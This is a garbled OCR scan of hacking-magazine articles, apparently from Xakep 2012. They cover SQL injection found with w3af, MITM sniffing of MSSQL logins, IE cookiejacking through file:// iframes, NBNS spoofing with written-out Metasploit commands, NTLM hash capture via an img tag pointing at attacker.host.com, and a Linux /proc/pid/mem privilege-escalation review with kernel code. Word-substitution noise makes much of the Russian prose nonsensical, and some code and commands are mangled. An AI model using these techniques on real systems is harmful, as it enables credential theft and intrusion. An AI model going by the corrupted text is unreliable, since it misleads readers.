метров? Пожалуйста! Генерировать соответствующие токены можно на томишко а Pythoп. С через редактора НТТР - запросов, на котором есть даже если простая п одеветка НТТ Р - синтаксиса, не грех отправлять одиночныезапросы . Ч астовозникаетнеобходимостьвыполнить

Пол у ча е мш е лл че р ез S QL-инъекцию

гаммирование некоторый строки во

URL иначе говоря попросту счесть МО5сумму. Конечно, позволено бегом нанять «echo -п "admin" 0 md5sum>>

:1 Как твоя милость сделано дога­

во консоли, только пускать в ход пользу кого сего вделанный шифровальщик немно­

Бинго! Обнаружена классическая SQ L-инъекция .

го удобнее. П ри раскрутке следующий бессознательный SQL-инъекции имеет принципиальное значение

дал вместе с автор этих строк , эт по отношению з апускаются всё те а плагины, которые твоя милость выбираешь близ

размежевывать средь лицом ответы веб-сервера , ради а тебе мамой клянусь

об ычном ск анировании.

пригодится вделанный

diff.

Для поиска «слепых>> от кулей равным образом поглощать специальные плагины. Вы­

Ну да наконец, когда твоя милость « вайтхат >> alias про­

сто ученик безопасности, так заказчику пентеста необходимо до казать, наравне

ключим выход ошибок на настройках РНР равным образом попробуем задетектить т с

«работает»уязвимост~используявозможностьзкспортазапросов

ж е ба г, же ранее вслепую. С через НТТР-редактора посылаем пару

на форматы

з апросов для нашему веб-приложению: /useг-info.php?id=1 равным образом /useг-info.

Python. Иными словами , дозволительно сказать: «От­ на жмите .. Сабмит " равным образом смотрите, как бы появляется

HTML, AJAX

кройте смотри эту форму,

равно

p h p? id=1 % 0Ы , а в рассуждении сего передаем р езультаты средству интересах сравнения тра нз акций. В результате возле вып насчёт лн е нии SQL-зaпpoca срабатывает

JS-сообщение ... >>

пр ос тейшее алгебраическое выражение, равным образом наша сестра получаем двуха разных

Р ассмотрим типич н ый план использования сих инструмен­ тов . Запускаем прокси равным образом шаримея в соответствии с равным образом вместе с следуемом у веб-приложению

отв е та [информация дл автор этих строк р а зны х польз по отношению вателей!. Дальнейшим медленный

[не забываем привнести проксирование трафика на подсвечник у зереl.

м ож ет вместе с вор всё та но э кс пл у атация со ко ули .

На вкладке Histoгy видим отображаемый во реальном времени НТТР­

OUTRO

затор среди браузером равно сервером. В случае со больше мощным при­

ложением, пример чатом , транзакций довольно куда больше.

WЗ af- сие действительн об сильный фреймворк на материал т ирования

В экий ситуации наравне грешно к лицу склифосовский атомный фильтр : со его

б ез оп от же от ти веб-приложений . Рас из казывать насчёт нем дозволено растянуто ,

через можно, ко примеру, порождать исключительно транзакции вместе с такими за­

п что до этом у автор ставил предварительно вместе с по отношению б насчёт й задач у сообразно показывать его на действии.

просами, которые содержат границы во строке << Запросы>> равным образом возьми кото­

Важно, что-нибудь сие безграмотный прос т относительно текущий скэнар безопасности, а в частности

рые был получен 0хх-й ответ.

фр е ймворк, большое величина дополнений тому доказательство. К тому ж е на человека , получай базовом у ровне знающего веб да

Вернемся ко нашему приложению. Во период навигации объединение нему

Python,

замечаем, ась? близ наведении возьми аватар пользователя появляется

неграмотный со ставиттруда прикинуть недостающий функционал иначе говоря проверку.

всплывающее «окно>> от информацией об этом пользователе. Эта

К не без; тати , на правах равным образом любому свободному проекту, wЗaf нужны новые раз­

рэнкинг выдается во результате большей частью го АJАХ-запроса ко

ра б отчики, тестировщики да нетрудно активные пользователи. Кого

/useг-info.php?id=1, который видать на истории запросов . Давай протести ру­

з т насчёт з аинтересовало, собственность nожаловать на согласующий роспись

ем настоящий скрипт получи и распишись уязвимости. Для нашего запроса во кадастр выбираем

рас из ылки [ wЗ af . souгce f oгge . ne t l либо для IRС-канал #wЗaf во тенета

«Audit

гequest

with ... >>- нас

интересует, поглощать ли с годами SQ L-инъекция .

Fг e enode. ::х::

ld:47

ld: 06

LАутентификация J

~~-----..

[ Сбор ссылок

GЕТ http :/Jloca.lhost /u ser - i n fo .~p 0id-1 НТТР/1.1

~

Accept -l.angu•: en-us,en;q-e.s Accept-encodi ng: identity Keep-alive : 015 Accept : text/htlll, арр lication/xhtlll+XIIl, арр licat ion/XIIl: q..e. 0

user-agent : Нozilla/S.e (Xll; Linux i686; rv:2.&.1) Gecko/Z81 Accept -charset : IS0-8859 - l, ut f -8; q-e. 0, • ;q-e. 0 Нost: localtюst

Refe re r: http://localhosttindex.php Cookie: PНPS ESSI D-гf 0vdbs j ist7is3j6 rlc3p462S

Proxy- connect i on; keep- а li ve

~GЕТ h t tp ://loc al ho s t t u ser- in fo. php 0id· 0~Bl НПР/ 0 . 0

Accept- l anguage: en-us,en;q-e.S Accept-encoding : identity Keep-alive: 015 Accept: text/ht.l,application/xhtii\+XIIl ,application/xlll ;q..e. 0 , .-, . ;q-8.8 User-agent: t10zilla/S .8 (Xll ; Linux iб86; rv:2.8. 0) Gecko/28118438 Firef o Accept -charset: IS0-88S9· 0,utf -S; q-8. 0, • ;q-e. 0 Нost: localhost Referer : http://l ocalhos t /index. php Cookie: PНPS ESS I D• rf 0vdbs j ist7 is З jбrlcЗp462S Proxy-connection: keep-alive <style>

<style>

"' (height:

"'( height :

ерх; Ьorde r : 0рх; Ьorder-top:

</ style> <tаЫе Ьo rde r- " 0 "

<tа Ые Ьогdег-· е· от е\ \sp<~c i ng- " S " c\ass-· userТaЫe">

~ <1: Г><t d> Fi rs t natlf!: </td><td>Jaii'IE!s</td></t r> <t r><td>Las t na~~e : </ td><td>Bond</ td></ t r> <tr><td colspan• "2"><hr />1 like Vodka ... shaken not stirr <t r><td co\s an•"2 "><hr /><а href• "/IIIE!ssages .p_h ?to•jai'IE!s </t r> </table>

0Sellext lo compare J

ХАКЕР

03 / 058/ 00 02

Ipx solid gray;

0

0 </sty\ e>

Модель работы группа равно болтовня для ого ск анера уязвимостей веб - прило ж ени й

ерх;

Ьorder: ерх; Ьorder-top:

l px solid gray;

~

cell spacing•" S" cla s s-~ us e rТaЫ e "> <tr><td>Firstnane: </td><td>A\isa</td></ t r> <1: r><td>Las tnaii'IE! : </td><td>Se lezneva</td></t r> <tr><td colspan•"2"><hr />Spacegir\1 J! !</td></tr> <tr><td cols an•"2"><hr /><а href• " /IIE!ssages . ~h~7to-alisa " >Send Priva </ t r> </tabl e>

[<lo::J o12

Утилита равно з смесь а wЗ af про сравнения НТТР-т ранз акций

051


ВЭЛОМ/ЕАSУ НАСК

защитник «GreenDog » Тюри н, Digital Security ltwitter.com/antyurinl

ОТСНИФАТЬ ПАРОЛЬ ПРИ АУТЕНТИФИКАЦИИ В

MSSQL

Ef.3Jf..i!f.·l ъ--

Microsoft SQL server- сие

одна изо самых распространенных СУБД.

0.

Шифрование приемлемо , хотя отключено:

ENCRYPT_O FF- ОхОО. ENCRYPT_ON - Ох01. ENCRYPT_NOT_S UP - Ox02 .

Шифрование удобоваримо равным образом включено:

З.

Шифрование недоступно:

Как равным образом многие оставшиеся пищевые продукты

Microsoft, SQL server предлагает два вида аутентификации : integrated [sign-on], ведь очищать аутенти­ фикацию п что до виндовой у ч етной записи, да native, так поглощать классиче­

0.

Шифрование требуется: ENCRYPT_REQ-OxOЗ.

скую, согласно логину равным образом жете ролю. Оба способа используются вдоволь

тря держи название, зашифровка присутствие таком значе нии используется,

часто.

только всего-навсего про процесса . А вишь в отдельных случаях есть смысл

По дефопту данные, передаваемые объединение сети, почти что

зашифровка неграмотный используется совсем. Таким образом, да мы со тобой весь

безвыгодный шифруются. Если точнее, ведь шифруется эксплуатация аутентифи­

можем осущест свивать классическую МiТМ-атаку и, подменив информация

кации пользователя, а самочки данные- нет. Конечно, на атаки

лишь только на одном жете кете, всецело отключить зашифровка

сего было бы достаточно. Зачем нам логин равным образом жете роль, разве ты да я

да отснифать аутентификационные данные.

Давай рассмотрим двум ее особенности.

0.

0. 2.

г

По дефопту устанавливается значимость

ENCRYPT_O FF.

Несмо­

ENCRYPT_NOT_SUP,

Кстати, творец сего исследования довел всё давно логического

можем возьми лету модифицировать запрашивание другими словами получитьданные , просто-напросто только лишь

устроив arp-spoofiпg в обществе сервером равным образом клиентом? Затем, почто сие

конца - создал часть на

никак не самое насчет стое труд - фальсифицировать кое-что получи лету. Поэтом у по­

после нас равно сделает. Только , думаю, з десь игра стоит свеч затронуть одну особен­

Metasploit Framework,

кто всё

ность. В описываемом случае часть никак не меняет сведения держи планирование у,

пытаемся вытащитьлогин равным образом пароль.

а поднимает ТСР-порт, равно всего лишь не без; него документация редиректятся

Не эдак издавна бог весть кто лещадь ником fOrki изучил текущий задача [!J.i.LЬ'L s8g07r l. Посмотрим, зачем но некто выудил. Дл моя особа альфа и омега то, который дан­ ные MSSQL передаются на выкройка т е Tabular DataStream protocol

получи MSSQL-cepвep вслед контокоррент сызнова одного соединения, созданного уже атакующим, что, тем далеко не менее, малограмотный создает особых проблем. Всё, сколько

требуется, - з т касательно образовать редирект трафика, приходящего

[ bit . ly/z З oVPR I. Н что до самопроизвольно настоящий пр отокол безвыгодный поддерживает шифрова­

нате хост атакующего задним числом arp-spoofing-aтaки, получи годный

ние . Как но так? Откуда зашифрованные п акеты авторизации?

местного характера порт. Но равно эту следовать дачу

После непродолжител ьны х мучений из

во близкий часть куцый shеll-скрипт.

Wireshark fOrki

обнаружил

автоматизировал, добавив

fOrki

конец интересную вещь: с целью шифрования в этом месте использу­

ется ординарный

SSL [с самоподписанным сертификатом], который TDS . Нестандартное решение. Но сие отнюдь не приблизительно

-----

-

- -

--

-

-

~--------

работает вн утри

важно. Самое интересное- сие установка ТDS-соединения, так называемого пакета

PRELOGIN . Он

-

-----

задает разнообразные

настройки да во томик числе указывает, бросьте ли использоваться шифрование. За зашифровывание отвечает поле рое может получать сле д ующие значения:

052

- - -

ENCRYPTION,

кото­

------------

-

-

- - - -- - - - --

Выбор метода держи основании флагов, установленных у клиента равным образом сервера

ХАКЕР

03/158/2012


EASY

УГНАТЬ КУКИСЫ С ПОМОЩЬЮ

UI-REDRESSING

НАСК

......... ·Jйи г

В декабрьском номере][ ты да я познакомились вместе с экий вещью, в качестве кого

clickjacking.

насчёт -·

Сrатья была очен ь полезной, а составитель неграмотный упомянул об

одном замечательном трике. На самом деле обозначение

т

~ Р - ~ - G~ ·

Adcms iQ c:'iOocunert:sns.ttnat~

clickjacking ui-

никак не отнюдь согласно правилам отражает главное атаки, да ми кажется, аюшки?

сие больше правильное nонятие. И мастерство , которую моя особа

redressing -

.,_

опи ш у ниже,- самое яркое т ому подтверждение.

Итак , n озволь изобразить тебе технике рассказал

cookiejacking. Впервые об этом Rosario Valotta для HITB во Амстердаме на 0011

0iS9l003 .Z<19775128.132514ИЭ9 .132 . account.в .9CJ09le. соа/ >600

году. Потенциал техники огромен- nросто до не без; тавь , что-то от ее по­

088086656

мощью дозволяется nо хи тить куки ото люб касательно го ущелье та , аж с защищенно­

ll3080 0SS Z

00191238

го НТТРS-протоколом! Однако тогда лакомиться небольшее усечение :

работает возлюбленная лишь только на

что до

D

IE !но зато в всех версиях! . Теперь давайте

Во-первых, некто использовал

IE.

0-day,

которая как не быть закачаешься всех

С виду сие малограмотный такая быстро равно вместе с трашная дырка, а после у ее

невыгодный отдельно стремились пропатчить. Как твоя милость сейчас знаешь, во

st..edDotunerts

~ Мy((ЩIII:et"

_,;j...,__."""

посмотрим, почто а п редлагает нам таковой И Б-специалист.

версиях

.....- .

IE

Об х од кр осс- зон же й политики равным образом вход для локальным кукисам с зоны паутина

принимать

узлы. В разных зонах действуют неодинаковые настройки безопасности.

Rosa rio сие мячик! на другой !сетка!. Под мячик я прячем выше- iframe от кукисам и, а сверху самом

Н аn ри мер, описанная вне автоматиче ска мы NТLМ-а утентфикация

сайте создаем переработчик ради переносимых данных. Н по отношению равно сие до этот поры

такая фича, по образу раздвоение получай зоны:

д ейст вует дл моя особа уз охота зоны

lntranet

lnternet, lntranet,

доверенные

равно выше. Вот сnисок зон, отсо­

- переместить одиночный деталь !в притча е

безвыгодный всё . Нашему

iframe

пишущий сии строки добавляем признак

scrollspeed

от большим

значением. Это что поделаешь на того, с тем клик, совершаемый

ртированных во nорядке уменьшения привилегий:

пользователем, превращал ся во относительно перацию отделения после число отсчетов само­

стоятельного перемещения lпроскролливанияl

Local Machine Zone Local Intranet Zone Trusted Sites Zone Internet Zone Restricted Sites Zone

iframe с самого

верха во самы й низ. Таки м образом, получается, сколько читатель во время общество получай самом деле выделяет шрифт в мячик во корзину, перемещает сие т машинопись

iframe, а перемещая drag & dгор'ом, на итоге пере­

давая молитва хакеру. Возможно, сколько нате словах всё сие престижно невыгодный очень понятно, однако по образу только лишь твоя милость посмотришь видео бери сайте

Rosario Valotta

С без п маг и волшебник н ос т ью да зонами связан уже сам момент- миропонимание

I Ьit .l y/iN xvT Ь) , в таком случае зараз поймешь логику метода и, во частности, техни­

кросс-зон ног об взаимодействия. Согласно самому общему прави­

ки сопtепt extractioп, ажно даже если твоя милость малограмотный наслышан со

со паче привил егированной . Та ким образом, извещение заключение

<iframe

JavaScript.

Думаю, что-то сейчас проститутка концепция атаки ясна . Однако у нее убирать

лу, ме н ее привил егирован н а автор этих строк зо нате н е может взаимоде йствова ть

изрядно нюансов. Во-первы х, буква набег работает держи всех ОС

кук и. Таким образом, бери стра книзу у сайта зоны и да и нет дозволяется

Windows, аюшки? равно создает проблему :1. Файлы кукисов во ХР равно в Vista/7 лежат на разных местах . Для ХР сие C: //Documents and Settings/%user_name%/Cookies, а про паче новых версий винды -C: /Users/% user_name %/AppData/Roaming/Microsoft/Wi ndows/ Cookies. Тем невыгодный менее, э т а « осложнение » решается шабаш просто,

встав ить не без; ледок ую щий фрейм:

однако значительная браузеров отправ л яют во каждом ради пр осе заголо­

src="file: // c :/boot . ini " >

со страницы зоны интернетприведет

ко ошибке дост у па. Уязви мость

0-day

состоит на том, который кросс-зонная курс

безграмотный действует на оnре д елен ны х файлов, а не кто иной на файлов

вок User-Ageпt, какой-никакой беда зачастую содержит во себя равным образом версию ОС.

<iframe src="file :///C: // Documents and Settings / %user_name%/Cookies " > </iframe>

Кроме того, чтобы опре дел ения версии ОС допускается использовать в своих целях тем же

JavaScript.

Во-вторых, в духе твоя милость , автор этих строк д умаю, заметил , нам надлежит

пробовать прозвище пользо вателя для его компьютере, равным образом сие главная про­

Здесь % user_ пame % - сие наименование пользователя во ОС. Куки но

блема. Для ее решения не возбраняется рыпнуться приневолить пользователя

у каж дог в рассуждении п что касается ль зователя свои, п оэ в таком случае му хра нят ся они во личных п ап­

приспособиться согласно протоколу

ках . Пр да мер, иллюстрирующий прочитывание кукисов

передает прозвание пользователя одинаково из другими полями. Дл автор сего

Google,

твоя милость сможешь

SMB.

Пр равно подключении сообразно н ему жертва

бери ядовитую страни ц у нужно примолвить гляди подобный споровик

уви подевать нате скриншоте.

Во-вторых , помимо 0 -d с собаками далеко не сыщешь - бага, доксограф использовал специальную

extraction lпредстав ­ лена П олом Стоуном получи и распишись BlackHat Europe - 0010, goo.g i/ZBYNw l. Зачем? Хо тя автор равным образом подгрузили на iframe обложка не без; кукисам и, всё же

кoд:<img

технику clickjackiпg·a подо названием conteпt

src=" \\attac ker.host.com\ any . jpg" ></ img >.

Конечно, единаче потребуется водрузить обрабатыватель запросов

получай

045

порт, а дальше сформировать его согласование из wеЬ ­

сервером. Как видишь, рассказанный путь прямо шикарен! Однако

заразиться д ос т у п ко данны м во н ем автор отнюдь не можем. Здесь д ействует

потенциал е г об использования чаще общей сложности огра н ичивает филь­

кросс-д омен ная курс , как-никак отечественный сайт находится так во сети,

трация такого трафика держи сетевых устройствах . К тому но з д есь

а на

встает до сей времени одна проблема. На дворе еще весна-красна 0012-го, а

ifram e у

нас сидит

localhost

пользователя.

Суть этой специальной т ех ники довольно проста. Все совре ­ менн ы е браузеры поддерживают

drag & drop,

со п омощью которого

пофиксила у язвимость во

Microsoft

IE

Microsoft

сызнова на начале осени 0011-го. Кроме того,

внесла изменения на обозначение кукисов на файловой

читатель может выпить до дна чашу факты со что касается дног насчёт сайта для др угой .

системе. Теперь их названия лишились п что касается н ятного удобочи т аемого

Таким об ра зом, скольжение е р , сообразно сут равно , копирует данны е на по части дн ом месте

вида user_пa meradomaiп[couпter].txt да из т аль похожи возьми буквенно­

да вставляет на другое . Кросс -дом е нным п олитикам з д есь прицепиться

цифровые рандамы может статься 07ТVLB D W.txt. П оэтому перевоплотиться ко ним

безграмотный ко чему. Так вот, сопtепt extractioп - это, попроще говоря , мало-мальски

напрямую эдак без труда еще отнюдь не половая принадлежность учи тся. Впрочем, по мнению статистике,

перетолкованный

архи малое численность поль зователей загодя обновляет

drag & drop. Заманив

бери злой clickjackiпg-caйт

нашу жертву, пишущий сии строки предлагаем ей, например, потренькать во игру. Ее квинтэссенция

ХАКЕР

03/158/ 00 02

от вои браузеры, особенно если бы слово подходит об

IE.

053


ВЗЛОМ/ЕАSУ НАСК

СОБРАТЬ ИНФОРМАЦИЮ РЕШЕНИЕ

SkiJJ Tracino Framework

Сбор информа ц ии яв л яется об д ним с важнейших этапов подле про­

;\ ' Ift'(' '•\ , 0 0 \

l

J(r~>r

,J 0'l tlll , ' ' , о..; 0'1,

.. t l

"it .._

ведении ауДита без п аснос т равным образом lну сиречь атаки). Ведь нам необходимо найти самое слабое простор да кроме рисковать грабить вследствие него всю систему. Но для чего иска т ь запутанный путь, разве самым слабым местом любой, даже если самой защищенной системы является чело­ век? Ты безусловно знаешь что касается существовании таковский замечательной

DNS command Une

вещи, вроде социальная инженерия. Е е действенность напрямую

***'*

WeЬsfte

зависит ото доступной информации что до человеке, следственно тысячи

*** IPNelghЬors

специалистов равно проводят небо и земля исследования возьми эту тему.

***,

Однако во России этакий т ен д енции доколе ась? неграмотный наблюдается, круглым счетом

Spamllsts

***•

во вкусе наши пользователи си д моя персона т во основном исключительно во Одноклассниках

MaШngllsts

да В Контак т е, д а равным образом для ц есс информатизации вновь без затей невыгодный доше л

***

DNS lnformetion Gathering command line • Flen:e Domllln scan i:J

****; **** • DNSEnumtooi GI ***i • S dlg ~ns.domaln .com domaln.com AXFR ***

• The Н.rvester comm.1nd llne tool Q

Q

Machinespeclflc

вплоть до большинства ведомст во . В любом случае пишущий эти строки думаю, в чем дело? тебя за­

интересует замечание

lntorm•tlon

tools

***;

makensi .es/stf. Автор этой страницы никак не поле­

нился снарядить во одном месте безграмотный плохую коллекцию всевозможных онлайн-сервисов, которые могут найти применение тебе на процессе взлома не так — не то пентеста, воеже произвести всю необходимую информа­ цию вроде касательно человеке, приближенно да об всей подопытной системе.

О nреде nя ем nлаги ны

WordP res s

НАЙТИ АЛЬТЕРНАТИВУ DNS И ПРОСПУФИТЬ NETBIOS

li•iaf..i!!f.ll т ·лw т

е со ли на файле перевелся nри вязок, производит интерпелляция ко D NS - cepвepy. За ­ Всем нам известно, что-нибудь про определения IР-адресов по части именам

те м

используется учет

Здесь пристало уточнить, сколько

неприятности об безопасности !тогд а существовали больше важные зада­

NetBIOS Name Seгvice. NetBIOS входит на Windows согласно дефолту, а NetBIOS Name Seгvice INBNSI- сие оный но протокол, токмо

чи), того во сегодняшнее эпоха на нем кушать воз недостатков

предназначен симпатия интересах установки соответствия посередь NеtВIОS­

вместе с точки зрения безопасности . Однако получи и распишись смену ему изволь

именами да IР - адресами. В процессеработы настоящий документ либо

ONS.

Протокол проектировался лишенный чего особой

DNSS EC,

Windows

использует такую штуку, равно как

да моя особа надеюсь, который си т уа ц ия изменится на лучшую сторону. Сами не­

использует специально предназначенный WINS-cepвepa, либо отправляет широко­

достатки

пророческий вопрос во невод !думается, в настоящее время рецепт атаки понятна).

DNS

в особенности здорово проявляются во локальных сетях,

Но вернемся ко покамест одному важному моменту- D NS-зanpocy

особенно неравно наш брат можем прово д ить атаки будто aгp-poisoning, позволяющие п росматривать да мо д ифицировать трафик, которым

для серверу. Если сервер ответит пользова т елю, ведь вслед п рос согласно

обме н иваются жер т ва да се рв е р . Н об д авай предположим, ч т что до

сделано безграмотный склифосовский отправлен . А наравне а DNS-cepвepy н е ответи т ь, сделал л да

NBNS

объединение каким-то п ричинам всё э т относительно нам невыгодный д оступно, даже если наш брат равно находим­

захватывающий пользователя сайт ХХХ.СО М равным образом м ее т ОN S-за п ись?

ся во одной лока л ке от жертвой . П усть, например, на сетке при­

Здесь наш брат можем использовать в своих интересах возможнос т ями современных

сутствует некая

браузеров : поиском с адресной строки да подстано на каковой доменов

005,

равным образом ты да я ничуть далеко не хотим, воеже один человек заметил

нашу хакерскую предприимчивость . Тогд а нам нужно орудовать тихо,

верхнего уровня

используя всего-навсего группировка д артные потенциал протоколов. Уточню

привыкают знакомить то, в чем дело? их интересует, стоймя во а д ресную стро­

l.com,

.гu) . Как именно? Сейчас пользователи

задачу. Нам надлежит поймать куки, передаваемые пользо­

ко у, же браузеры малограмотный денно и нощно могут понять, хочет ли читатель

вателем сверху теоретичный сайт ХХХ.СОМ. Изначально может пока­

самую малость раскопать на поисковике тож прямо-таки выявить сайт. Е из т ь, конечно,

заться, сколько теорема невыгодный имеет решения, хотя дайте рассмотрим, каким

определенные паттерны !например, пробелы во адресной строке),

образом ОС

Windows

однако неизмеримо чаще браузерыв первую черед резолвя т отчество только лишь

определяет IР-адрес сайта. Первым делом

строй проверяет статическую привязку

IP для

упомянутым повыше способом . Что до сей времени интересней, подле отправке

именам, хранящим ­

ся на файле hosts IC : \Windows\System32\dгiveгs\etc\hosts). Д алее,

• FiltEr: J(chs ог No.•

' 1,..

Заnрос

051.

.

08313 . 063879 485 03 . 086589 493 03 . 00'3700 494 03 . 005520 528 04. 05 0488 570 05 . 005637 URL во

...

nros ) and ip.addr

0 Time

0Destnation

0Source ~

DNS-зanpoca для введенной пользователем строке добав л яется

0 123 2 123 123 123

=

Ejp'ession ... Cleat Арр!у 1 ProtDcol

023 2 123 255 255 255

ONS DNS DNS NBNS NBNS NBNS

lmro

. .. .

Standard query response_. NO such Standard query А makaka. stanoard query response, No such Name query NB МАКАКА<00 > Name query NB МАКАКА<00> Name query NB МАКАКА<00>

nате

nате

браузер е nоро ж дает nачку ра з личны х заnросов для того резолва равно мени

ХАКЕР

03/158/2012


EASY

027 128 162 163 185 186 258 259 319

068.190841 368. 027678 423. 072957 423.407005 442.487183 442:734222 666. 050204 666. 081655 727. 067776

092.168.0.101 192. 068. о. 002 192.168.0.101 192. 068.0.102 192. 068. о. 001 192.168.0.102 192.168.0.101 192.168.0.102 192.168.0.101

092.168.0.255 192.168 . 0.101 192.168.0.255 192.168.0.101 192.168.0.255 192.168.0.101 192.168.0.255 192.168.0.101 192.168.0.255

NBNS NBNS NBNS NBNS NBNS NBNS NBNS NBNS NBNS

02 104 92 104 92 104 92 104 92

Name Name Name Name Name Name Name Name Name

query query query query query query query query query

НАСК

:00> NB ?? response NB 092.168.0.102 NB iiiliiiliiiliiil lliiilll RU<OO> response NB 092.168.0.102 NB .GOOGLE.COM<OO> response NB 092.168.0.102 NB .-RU<OO> response NB 092.168.0.102 NB AASDASD 0188RU<OO>

N B NS- cn yф ан r во д ейст вии

несомненный суффикс, во результате аюшки? из что следует полное до­

0.

Запускаем : run .

менное наименование .

Вернемся для краже кукисов. Итак, используя NВNS-спуфинг, да мы от тобой

Теперь нам что поделаешь подделать противоречие бери NBNS-зanpoc. Для этого нужен Tгansaction

00

можем занять место какой-либо рандомный запрос. Но нам нужны

изо NBNS - зanpoca . Но , как бы поуже было

сказано выше, нынешний задание чаще сумме является широковещатель­

кукисы вот поэтому и есть из ХХХ.сот, а вследствие этого да мы от тобой проворачиваем неболь­

ным, а приблизительно что автор находимся на праздник но локалке , в таком случае никаких проблем

шой трюк- поднимаем веб-сервер со страничкой, содержащей

не без; его получением нет. К нашей радости, чтобы спуфинга на

закамуфлированный структура !можно заюзать JavaScгipt) , а сделано во зто м фрейме

MSF ранее

nрисутствует уместный модуль. Вот краткая график дей­

загружаем ХХХ.сот. Однако нам необходимо никак не просто-напросто найти применение ХХХ .

ствий:

сот, хотя пока что да предпринять так, в надежде браузер никак не ес его из через

0.

Загружаем модульдля Net BI OS-cynnингa:

use auxiliary/spoof/

0. 3.

0.

DNS

равно начал истощить про поиска всего только

NBNS.

Очень хоть куда ,

так чтобы браузер продолжал подсчитывать просп уф ленный землевладение тем но

nbns/nbns_response. Выставляем регэпс ответов держи требования :

Set REGEX *google*. set spoofip xa.kep.

самолично ым доменом, а то во силу вступят кросс-доменные политики

равно никаких кукисо во я далеко не увидим. Так как бы указанная методика

Указываем, кой IР-адрес подставлять:

IP.add r ess.

разресерчивалась на правах единовременно в эпоха написания сего текста, ведь

Зanycкaeм: run.

единственным достойным вариантом стало быть заявка ко н есуще­

Теперь сделаю небольшее отступление. Создатель сего моду­

Теперь м касательно ж однако следовательно общ равно й алгорит м а таки :

ствующему поддомену атакуемого сайта.

ля ITiт целей

Medin) предлагал истощить его окончательно ради други х lgoo.gi/Jz2Q9), а вот поэтому и есть на банального сбора NТLМ-хешей.

0. 2.

Поднимаем wеЬ-сервер вместе с легированием входящих запросов

!чтобы соби битва кукисы) равным образом фреймом, ссылающимся получай несуще­

Е сли точнее, в таком случае потом запуска вышеуказанного модуля ото браузе­

ствующий поддомен ХХХ.сот !например , asdasdasd.XXX.coт ) .

ра приходит куча запросов, п ричем чаще итого из что-что следует

спуфить короткие имена ! будто тakaka), а невыгодный длинные lтakaka. сот). С учетом логики работы Windows короткие имена причисля­ ются ко зоне интранет !не интернетl). А буква область распространения во IE будто бы « до­

Устанавли ваем NВNS-сп уфи нг получи и распишись постоянно имена.

0.

Жертва, которая ввела черт знает что во адресную строку браузера, спу­ фится объединение

0.

NBNS да

спуфится до

веренной», да во ней действуют несравнимо не так грозные настройки безопасности. К примеру, в этом месте разрешена автоматическая аутен­ тификация для сайтах. Таким образом, пишущий сии строки можем швырнуть узел

0.

редиректится бери хостхакера.

Бра узер автоматом резалвит asdasdasd.XXX.coт, и, опять двадцать пять же,

NBNS.

Браузер насчёт тправляет кукисы ХХХ.сот возьми asdasdasd . XXX.coт, то есть держи хостхаке ра.

интересах сбора N Т LМ-хешей соответственно Н Т Т Р !хотя позволяется да в области

0.

Загружаем модульдля

SMB): снифинга: use auxiliary/server/

Так им образом, я можем нахватать кукисы с множества сайтов. Ед инст венн ое приостановление после этого во том, чтокукидолжны

capture/http_ntl m. 2. 3.

Страница, идеже хорошенького понемножку создавать ся запрос:

являться установле ны невыгодный сверху ко нкретный отделение IХХХ . сот), а держи владение

Порт, идеже поднимется веб-сервер :

I . ХХХ.сот) .

set URIPATH . set SRVPORT ве .

ПЕРЕХВАТИТЬ ТРАФИК НА

LOCALHOST ПОД WINDOWS

ы.r.&~tfl г.

Недавно автор столкнулся от безвыгодный возможностью миновать затор

настройки

от прокси рядом системных обращениях для

прокси бери

-127.0 .0.1. Почему

localhost

системных? Потому, что такое? настройки

щиеся прокси , используются большинством ПО в мер,

Python

или — или ко л у пбзку

IE, касаю­ Windows. Напри­

присутствие использовании uгll i b2 автоматом беретик прокси

г

IE равно .NET fгатеwогk запрещаюттрафику следовать через localhost равно 027.0.0.1 . В IE9 эту проблему посчастливилось урегулировать

следовать число отсчетов того , что-нибудь во настройках дозволяется избрать опцию << безграмотный исполь­ зовать прокси>>-

<<-localhost».

Решение , во общем-то, нечеловечески простое. Во - первых, не возбраняется

ОС . Надо отметить, почто заостреннее только п роблема проявляется,

вонзаться ко сервису до любому

IP

в отдельных случаях обслуживание поднят прямо в внутреннем интерфейсе 0127.0.0.1) и недоступен нате внешнем 00.0.0.0). В оный крат ми посчастливилось сделать выбор

возьмем за адресу

как бы до сей времени они относятся для одному

ее каким-то обходным как следует , хотя как-то моя персона наткнулся нате инте­

резолва имен hosts l % windiг%\dгiveгs\etc\hosts) другое кличка для lo calhost : 027.0.0.1 localhOst .

ресный шутцпункт на благе Eldaг Maгcussen. Он написал, что-нибудь дефолтные

ХАКЕР

03/158/2012

г

027.1.2.3, беспричинно

на

027

подсети, за исключением первого,

интерфейсу. Во-вторых , позволено nрописать во файле локального

055


Павелка Александрович [iv i nsi d e .Ы o g s p ot.com[

ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Митрей Михайлович

[115612, мол р. К рас н ая звездо ч ка, д . 0[

Обзор эксплоитов В этом интереснейшем обзоре автор сих строк рассматри­ ваем свежую небезупречность на ядрах

Linux,

позво­

ляющую вне особого труда распространить льготы

0

Локальное умножение привипегий во Linux

CVSSV2

0.8

0111111 011 0 011 01111

01 01 0 [AV: L/AC: L/AU:S/C:C/1 :C/A:CI

l:iil'II3] Уязвимость связана от интерфейсом /ргос/<РI 0>/mem [где <PID> идентификатор нужного процессаl, каковой Linux предоставляет

Microsoft Office равно Acrobat Reader, а тоже ХХЕ-инъекцию во phpMyAdmin.

на непосредственный запи от равным образом на кэш процесса да чтения с нее. В ядре версии

Не пропусти!

перед не без; тат по отношению чно защищен через неавторизованного доступа из через

во системе, баги во

0.6.39 разработчики у брали директиву #ifdef,

исключающую прямую

учет на воспоминания процесса, затем что сочли, что такое? настоящий интерфейс уже других ме х анизмов ядра. На самом деле nисать во мнема процесса мож е т кто хочешь пользователь, обладающий достаточными правами.

Как оказалось, сии карт-бланш проверяютсЯ безвыгодный совершенно корректно. В итоге пол у чило вместе с ыо , чтополучилось:вовсехверсияхядра,начинаяс

0.6. 09, злобно у мышл е нник может продвинуть объединение « карьерной лестнице» до рута любого имеющего со ваш покорнейший слуга пользователя .

056

ХАКЕР

03/158/20 02


Обзор экс пло итов

цt:J4!·Jii

int match; rcu_read_lock(); match=(ptrace_parent(task)==current); rcu_read_unlock(); i f (match && ptra ce_may_access(task, PTRACE_MODE_ATTACH)) return mm;

При открытии интерфейса / pгoc/<PID>/me m ваша сестра полня ется эдакий ко д :

static int mem_open( struct inode* inode, struct file * file) { file- >private_data=( void*)(( long)current->self_exec_id); file- >f_mode 0=FМODE_UNSIGNED_OFFSET; return е ;·

mmput(mm); return ERR_PTR(-EPERM) ;

